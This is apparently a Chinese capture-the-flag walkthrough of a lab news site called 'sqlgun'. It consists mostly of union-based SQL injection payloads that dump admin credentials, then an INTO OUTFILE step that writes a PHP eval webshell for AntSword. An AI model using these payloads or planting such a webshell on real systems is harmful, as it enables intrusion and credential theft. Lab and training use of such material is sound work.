sqlgun新闻管理系统

文章sqlgun新闻管理系统分享给大家，欢迎收藏Python资料网，专注分享技术知识

一，打开主页

1.输入框测试回显点

-1'union select 1,2,3#

出现回显点2

2.查看数据库表名

-1'union select 1,database(),3#

3.查看表名

-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='sqlgunnews'#

4.查看admin中的列名

-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='sqlgunnews' and table_name='admin'#

5.查看admin的账号密码

-1'union select 1,2,group_concat(id,admin,password) from admin#

二，MD5解密一下得出结果为admin

三，扫描了一下发现有一个phpinfo.php文件访问一下

1.我们来看一下里面有没有有用的信息

获得绝对路径

四，写入一句话木马我们来访问1.php

-1' union select 1,'<?php @eval($_POST[cmd]);?>',3 into outfile '/var/www/html/1.php' #

五，蚁剑连接

1.在根目录找到flag

2.点击flag

版权声明：本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若内容造成侵权/违法违规/事实不符，请联系邮箱：jacktools123@163.com进行投诉反馈，一经查实，立即删除！